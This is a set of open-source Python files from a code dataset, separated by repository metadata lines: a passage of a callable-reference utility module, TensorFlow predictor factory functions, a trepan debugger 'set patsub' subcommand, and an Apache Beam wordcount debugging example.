if f_class and hasattr(func, '__name__'):
return '%s.%s' % (f_class.__name__, func.__name__)
# class or class instance
if hasattr(func, '__call__'):
# class
if hasattr(func, '__name__'):
return func.__name__
# instance of a class with a __call__ method
return func.__class__.__name__
raise TypeError('Unable to determine a name for %r -- maybe it is not a callable?' % func)
def obj_to_ref(obj):
"""
Returns the path to the given object.
:rtype: str
"""
try:
ref = '%s:%s' % (obj.__module__, get_callable_name(obj))
obj2 = ref_to_obj(ref)
if obj != obj2:
raise ValueError
except Exception:
raise ValueError('Cannot determine the reference to %r' % obj)
return ref
def ref_to_obj(ref):
"""
Returns the object pointed to by ``ref``.
:type ref: str
"""
if not isinstance(ref, six.string_types):
raise TypeError('References must be strings')
if ':' not in ref:
raise ValueError('Invalid reference')
modulename, rest = ref.split(':', 1)
try:
obj = __import__(modulename)
except ImportError:
raise LookupError('Error resolving reference %s: could not import module' % ref)
try:
for name in modulename.split('.')[1:] + rest.split('.'):
obj = getattr(obj, name)
return obj
except Exception:
raise LookupError('Error resolving reference %s: error looking up object' % ref)
def maybe_ref(ref):
"""
Returns the object that the given reference points to, if it is indeed a reference.
If it is not a reference, the object is returned as-is.
"""
if not isinstance(ref, str):
return ref
return ref_to_obj(ref)
if six.PY2:
def repr_escape(string):
if isinstance(string, six.text_type):
return string.encode('ascii', 'backslashreplace')
return string
else:
repr_escape = lambda string: string
def check_callable_args(func, args, kwargs):
"""
Ensures that the given callable can be called with the given arguments.
:type args: tuple
:type kwargs: dict
"""
pos_kwargs_conflicts = [] # parameters that have a match in both args and kwargs
positional_only_kwargs = [] # positional-only parameters that have a match in kwargs
unsatisfied_args = [] # parameters in signature that don't have a match in args or kwargs
unsatisfied_kwargs = [] # keyword-only arguments that don't have a match in kwargs
unmatched_args = list(args) # args that didn't match any of the parameters in the signature
unmatched_kwargs = list(kwargs) # kwargs that didn't match any of the parameters in the signature
has_varargs = has_var_kwargs = False # indicates if the signature defines *args and **kwargs respectively
if signature:
try:
sig = signature(func)
except ValueError:
return # signature() doesn't work against every kind of callable
for param in six.itervalues(sig.parameters):
if param.kind == param.POSITIONAL_OR_KEYWORD:
if param.name in unmatched_kwargs and unmatched_args:
pos_kwargs_conflicts.append(param.name)
elif unmatched_args:
del unmatched_args[0]
elif param.name in unmatched_kwargs:
unmatched_kwargs.remove(param.name)
elif param.default is param.empty:
unsatisfied_args.append(param.name)
elif param.kind == param.POSITIONAL_ONLY:
if unmatched_args:
del unmatched_args[0]
elif param.name in unmatched_kwargs:
unmatched_kwargs.remove(param.name)
positional_only_kwargs.append(param.name)
elif param.default is param.empty:
unsatisfied_args.append(param.name)
elif param.kind == param.KEYWORD_ONLY:
if param.name in unmatched_kwargs:
unmatched_kwargs.remove(param.name)
elif param.default is param.empty:
unsatisfied_kwargs.append(param.name)
elif param.kind == param.VAR_POSITIONAL:
has_varargs = True
elif param.kind == param.VAR_KEYWORD:
has_var_kwargs = True
else:
if not isfunction(func) and not ismethod(func) and hasattr(func, '__call__'):
func = func.__call__
try:
argspec = getargspec(func)
except TypeError:
return # getargspec() doesn't work certain callables
argspec_args = argspec.args if not ismethod(func) else argspec.args[1:]
has_varargs = bool(argspec.varargs)
has_var_kwargs = bool(argspec.keywords)
for arg, default in six.moves.zip_longest(argspec_args, argspec.defaults or (), fillvalue=undefined):
if arg in unmatched_kwargs and unmatched_args:
pos_kwargs_conflicts.append(arg)
elif unmatched_args:
del unmatched_args[0]
elif arg in unmatched_kwargs:
unmatched_kwargs.remove(arg)
elif default is undefined:
unsatisfied_args.append(arg)
# Make sure there are no conflicts between args and kwargs
if pos_kwargs_conflicts:
raise ValueError('The following arguments are supplied in both args and kwargs: %s' %
', '.join(pos_kwargs_conflicts))
# Check if keyword arguments are being fed to positional-only parameters
if positional_only_kwargs:
raise ValueError('The following arguments cannot be given as keyword arguments: %s' %
', '.join(positional_only_kwargs))
# Check that the number of positional arguments minus the number of matched kwargs matches the argspec
if unsatisfied_args:
raise ValueError('The following arguments have not been supplied: %s' % ', '.join(unsatisfied_args))
# Check that all keyword-only arguments have been supplied
if unsatisfied_kwargs:
raise ValueError('The following keyword-only arguments have not been supplied in kwargs: %s' %
', '.join(unsatisfied_kwargs))
# Check that the callable can accept the given number of positional arguments
if not has_varargs and unmatched_args:
raise ValueError('The list of positional arguments is longer than the target callable can handle '
'(allowed: %d, given in args: %d)' % (len(args) - len(unmatched_args), len(args)))
# Check that the callable can accept the given keyword arguments
if not has_var_kwargs and unmatched_kwargs:
raise ValueError('The target callable does not accept the following keyword arguments: %s' %
', '.join(unmatched_kwargs))
|
gpl-3.0
|
meteorcloudy/tensorflow
|
tensorflow/contrib/predictor/predictor_factories.py
|
10
|
5570
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Factory functions for `Predictor`s."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.predictor import contrib_estimator_predictor
from tensorflow.contrib.predictor import core_estimator_predictor
from tensorflow.contrib.predictor import saved_model_predictor
from tensorflow.contrib.learn.python.learn.estimators import estimator as contrib_estimator
from tensorflow.python.estimator import estimator as core_estimator
def from_contrib_estimator(estimator,
prediction_input_fn,
input_alternative_key=None,
output_alternative_key=None,
graph=None,
config=None):
"""Constructs a `Predictor` from a `tf.contrib.learn.Estimator`.
Args:
estimator: an instance of `tf.contrib.learn.Estimator`.
prediction_input_fn: a function that takes no arguments and returns an
instance of `InputFnOps`.
input_alternative_key: Optional. Specify the input alternative used for
prediction.
output_alternative_key: Specify the output alternative used for
prediction. Not needed for single-headed models but required for
multi-headed models.
graph: Optional. The Tensorflow `graph` in which prediction should be
done.
config: `ConfigProto` proto used to configure the session.
Returns:
An initialized `Predictor`.
Raises:
TypeError: if `estimator` is a core `Estimator` instead of a contrib
`Estimator`.
"""
if isinstance(estimator, core_estimator.Estimator):
raise TypeError('Expected estimator to be of type '
'tf.contrib.learn.Estimator, but got type '
'tf.python.estimator.Estimator. You likely want to call '
'from_estimator.')
return contrib_estimator_predictor.ContribEstimatorPredictor(
estimator,
prediction_input_fn,
input_alternative_key=input_alternative_key,
output_alternative_key=output_alternative_key,
graph=graph,
config=config)
def from_estimator(estimator,
serving_input_receiver_fn,
output_key=None,
graph=None,
config=None):
"""Constructs a `Predictor` from a `tf.python.estimator.Estimator`.
Args:
estimator: an instance of `learn.python.estimator.Estimator`.
serving_input_receiver_fn: a function that takes no arguments and returns
an instance of `ServingInputReceiver` compatible with `estimator`.
output_key: Optional string specifying the export output to use. If
`None`, then `DEFAULT_SERVING_SIGNATURE_DEF_KEY` is used.
graph: Optional. The Tensorflow `graph` in which prediction should be
done.
config: `ConfigProto` proto used to configure the session.
Returns:
An initialized `Predictor`.
Raises:
TypeError: if `estimator` is a contrib `Estimator` instead of a core
`Estimator`.
"""
if isinstance(estimator, contrib_estimator.Estimator):
raise TypeError('Expected estimator to be of type '
'tf.python.estimator.Estimator, but got type '
'tf.contrib.learn.Estimator. You likely want to call '
'from_contrib_estimator.')
return core_estimator_predictor.CoreEstimatorPredictor(
estimator,
serving_input_receiver_fn,
output_key=output_key,
graph=graph,
config=config)
def from_saved_model(export_dir,
signature_def_key=None,
signature_def=None,
tags=None,
graph=None,
config=None):
"""Constructs a `Predictor` from a `SavedModel` on disk.
Args:
export_dir: a path to a directory containing a `SavedModel`.
signature_def_key: Optional string specifying the signature to use. If
`None`, then `DEFAULT_SERVING_SIGNATURE_DEF_KEY` is used. Only one of
`signature_def_key` and `signature_def`
signature_def: A `SignatureDef` proto specifying the inputs and outputs
for prediction. Only one of `signature_def_key` and `signature_def`
should be specified.
tags: Optional. Tags that will be used to retrieve the correct
`SignatureDef`. Defaults to `DEFAULT_TAGS`.
graph: Optional. The Tensorflow `graph` in which prediction should be
done.
config: `ConfigProto` proto used to configure the session.
Returns:
An initialized `Predictor`.
Raises:
ValueError: More than one of `signature_def_key` and `signature_def` is
specified.
"""
return saved_model_predictor.SavedModelPredictor(
export_dir,
signature_def_key=signature_def_key,
signature_def=signature_def,
tags=tags,
graph=graph,
config=config)
|
apache-2.0
|
rocky/python2-trepan
|
trepan/processor/command/set_subcmd/patsub.py
|
2
|
1775
|
# -*- coding: utf-8 -*-
# Copyright (C) 2020 Rocky Bernstein
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# Our local modules
from trepan.processor.command import base_subcmd as Mbase_subcmd
class SetPatSub(Mbase_subcmd.DebuggerSubcommand):
"""**set patsub** *from-re* *replace-string*
Add a substitution pattern rule replacing *patsub* with
*replace-string* anywhere it is found in source file names. If a
substitution rule was previously set for *from-re*, the old rule is
replaced by the new one.
In the following example, suppose in a docker container /mnt/project is
the mount-point for /home/rocky/project. You are running the code
from the docker container, but debugging this from outside of that.
Example:
--------
set patsub ^/mmt/project /home/rocky/project
"""
in_list = True
max_args = 2
min_abbrev = len("pats")
min_args = 2
short_help = "Set pattern substitution rule"
def run(self, args):
self.proc.add_remap_pat(args[0], args[1])
pass
if __name__ == "__main__":
from trepan.processor.command.set_subcmd import __demo_helper__ as Mhelper
Mhelper.demo_run(SetPatSub)
pass
|
gpl-3.0
|
wtanaka/beam
|
sdks/python/apache_beam/examples/wordcount_debugging.py
|
8
|
6469
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""An example that verifies the counts and includes best practices.
On top of the basic concepts in the wordcount example, this workflow introduces
logging to Cloud Logging, and using assertions in a Dataflow pipeline.
To execute this pipeline locally, specify a local output file or output prefix
on GCS::
--output [YOUR_LOCAL_FILE | gs://YOUR_OUTPUT_PREFIX]
To execute this pipeline using the Google Cloud Dataflow service, specify
pipeline configuration::
--project YOUR_PROJECT_ID
--staging_location gs://YOUR_STAGING_DIRECTORY
--temp_location gs://YOUR_TEMP_DIRECTORY
--job_name YOUR_JOB_NAME
--runner DataflowRunner
and an output prefix on GCS::
--output gs://YOUR_OUTPUT_PREFIX
"""
from __future__ import absolute_import
import argparse
import logging
import re
import apache_beam as beam
from apache_beam.io import ReadFromText
from apache_beam.io import WriteToText
from apache_beam.metrics import Metrics
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.options.pipeline_options import SetupOptions
from apache_beam.testing.util import assert_that
from apache_beam.testing.util import equal_to
class FilterTextFn(beam.DoFn):
"""A DoFn that filters for a specific key based on a regular expression."""
def __init__(self, pattern):
super(FilterTextFn, self).__init__()
self.pattern = pattern
# A custom metric can track values in your pipeline as it runs. Those
# values will be available in the monitoring system of the runner used
# to run the pipeline. These metrics below track the number of
# matched and unmatched words.
self.matched_words = Metrics.counter(self.__class__, 'matched_words')
self.umatched_words = Metrics.counter(self.__class__, 'umatched_words')
def process(self, element):
word, _ = element
if re.match(self.pattern, word):
# Log at INFO level each element we match. When executing this pipeline
# using the Dataflow service, these log lines will appear in the Cloud
# Logging UI.
logging.info('Matched %s', word)
self.matched_words.inc()
yield element
else:
# Log at the "DEBUG" level each element that is not matched. Different log
# levels can be used to control the verbosity of logging providing an
# effective mechanism to filter less important information.
# Note currently only "INFO" and higher level logs are emitted to the
# Cloud Logger. This log message will not be visible in the Cloud Logger.
logging.debug('Did not match %s', word)
self.umatched_words.inc()
class CountWords(beam.PTransform):
"""A transform to count the occurrences of each word.
A PTransform that converts a PCollection containing lines of text into a
PCollection of (word, count) tuples.
"""
def expand(self, pcoll):
return (pcoll
| 'split' >> (beam.FlatMap(lambda x: re.findall(r'[A-Za-z\']+', x))
.with_output_types(unicode))
| 'pair_with_one' >> beam.Map(lambda x: (x, 1))
| 'group' >> beam.GroupByKey()
| 'count' >> beam.Map(lambda (word, ones): (word, sum(ones))))
def run(argv=None):
"""Runs the debugging wordcount pipeline."""
parser = argparse.ArgumentParser()
parser.add_argument('--input',
dest='input',
default='gs://dataflow-samples/shakespeare/kinglear.txt',
help='Input file to process.')
parser.add_argument('--output',
dest='output',
required=True,
help='Output file to write results to.')
known_args, pipeline_args = parser.parse_known_args(argv)
# We use the save_main_session option because one or more DoFn's in this
# workflow rely on global context (e.g., a module imported at module level).
pipeline_options = PipelineOptions(pipeline_args)
pipeline_options.view_as(SetupOptions).save_main_session = True
with beam.Pipeline(options=pipeline_options) as p:
# Read the text file[pattern] into a PCollection, count the occurrences of
# each word and filter by a list of words.
filtered_words = (
p | 'read' >> ReadFromText(known_args.input)
| CountWords()
| 'FilterText' >> beam.ParDo(FilterTextFn('Flourish|stomach')))
# assert_that is a convenient PTransform that checks a PCollection has an
# expected value. Asserts are best used in unit tests with small data sets
# but is demonstrated here as a teaching tool.
#
# Note assert_that does not provide any output and that successful
# completion of the Pipeline implies that the expectations were met. Learn
# more at https://cloud.google.com/dataflow/pipelines/testing-your-pipeline
# on how to best test your pipeline.
assert_that(
filtered_words, equal_to([('Flourish', 3), ('stomach', 1)]))
# Format the counts into a PCollection of strings and write the output using
# a "Write" transform that has side effects.
# pylint: disable=unused-variable
output = (filtered_words
| 'format' >> beam.Map(lambda (word, c): '%s: %s' % (word, c))
| 'write' >> WriteToText(known_args.output))
if __name__ == '__main__':
# Cloud Logging would contain only logging.INFO and higher level logs logged
# by the root logger. All log statements emitted by the root logger will be
# visible in the Cloud Logging UI. Learn more at
# https://cloud.google.com/logging about the Cloud Logging UI.
#
# You can set the default logging level to a different level when running
# locally.
logging.getLogger().setLevel(logging.INFO)
run()
|
apache-2.0
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.